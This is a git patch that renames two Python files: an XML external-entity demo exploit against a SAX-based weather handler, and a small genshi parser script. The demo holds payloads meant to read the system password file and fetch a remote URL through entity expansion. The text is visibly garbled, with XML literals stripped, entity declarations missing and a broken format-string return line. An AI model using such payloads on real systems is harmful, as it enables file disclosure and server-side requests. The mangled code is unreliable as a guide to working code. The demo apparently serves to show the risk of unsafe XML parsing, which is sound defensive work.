From 1a5e5bf91e2a5af2352b2d660efc9d90179306eb Mon Sep 17 00:00:00 2001 From: Christian Heimes Date: Mon, 25 Feb 2013 00:51:07 +0100 Subject: rename python files --- other/python-external.py | 58 ---------------------------------------------- other/python-genshi.py | 9 -------- other/python_external.py | 60 ++++++++++++++++++++++++++++++++++++++++++++++++ other/python_genshi.py | 9 ++++++++ 4 files changed, 69 insertions(+), 67 deletions(-) delete mode 100755 other/python-external.py delete mode 100755 other/python-genshi.py create mode 100755 other/python_external.py create mode 100755 other/python_genshi.py diff --git a/other/python-external.py b/other/python-external.py deleted file mode 100755 index 2d0af47..0000000 --- a/other/python-external.py +++ /dev/null @@ -1,58 +0,0 @@ -#!/usr/bin/python -"""Demo exploit for external entity expansion -""" -import sys -from xml.sax import ContentHandler -from xml.sax import parseString - -xml_good = """Aachen""" - -xml_bad_file = """ - -]> -&passwd; -""" - -xml_bad_url = """ - -]> -&url; -""" - - -class WeatherHandler(ContentHandler): - def __init__(self): - ContentHandler.__init__(self) - self.tag = "unseen" - self.city = [] - - def startElement(self, name, attrs): - if name != "weather" or self.tag != "unseen": - raise ValueError(name) - self.tag = "processing" - - def endElement(self, name): - self.tag = "seen" - self.city = "".join(self.city) - - def characters(self, content): - if self.tag == "processing": - self.city.append(content) - - -def weatherResponse(xml): - handler = WeatherHandler() - parseString(xml, handler) - if handler.city == "Aachen": - return "The weather in %s is terrible.Unknown city %s" % handler.city[:500] - -for xml in (xml_good, xml_bad_file, xml_bad_url): - print("\nREQUEST:\n--------") - print(xml) - print("\nRESPONSE:\n---------") - print(weatherResponse(xml)) - print("") diff --git a/other/python-genshi.py b/other/python-genshi.py deleted file mode 100755 index 183d1fe..0000000 --- a/other/python-genshi.py +++ /dev/null @@ -1,9 +0,0 @@ -#!/usr/bin/python -import sys -from pprint import pprint -from genshi.input import XMLParser - -with open(sys.argv[1]) as f: - parser = XMLParser(f) - pprint(list(parser)) - diff --git a/other/python_external.py b/other/python_external.py new file mode 100755 index 0000000..7c5ab0c --- /dev/null +++ b/other/python_external.py @@ -0,0 +1,60 @@ +#!/usr/bin/python +"""Demo exploit for external entity expansion + +Author: Christian Heimes +""" +import sys +from xml.sax import ContentHandler +from xml.sax import parseString + +xml_good = """Aachen""" + +xml_bad_file = """ + +]> +&passwd; +""" + +xml_bad_url = """ + +]> +&url; +""" + + +class WeatherHandler(ContentHandler): + def __init__(self): + ContentHandler.__init__(self) + self.tag = "unseen" + self.city = [] + + def startElement(self, name, attrs): + if name != "weather" or self.tag != "unseen": + raise ValueError(name) + self.tag = "processing" + + def endElement(self, name): + self.tag = "seen" + self.city = "".join(self.city) + + def characters(self, content): + if self.tag == "processing": + self.city.append(content) + + +def weatherResponse(xml): + handler = WeatherHandler() + parseString(xml, handler) + if handler.city == "Aachen": + return "The weather in %s is terrible.Unknown city %s" % handler.city[:500] + +for xml in (xml_good, xml_bad_file, xml_bad_url): + print("\nREQUEST:\n--------") + print(xml) + print("\nRESPONSE:\n---------") + print(weatherResponse(xml)) + print("") diff --git a/other/python_genshi.py b/other/python_genshi.py new file mode 100755 index 0000000..183d1fe --- /dev/null +++ b/other/python_genshi.py @@ -0,0 +1,9 @@ +#!/usr/bin/python +import sys +from pprint import pprint +from genshi.input import XMLParser + +with open(sys.argv[1]) as f: + parser = XMLParser(f) + pprint(list(parser)) + -- cgit v1.2.1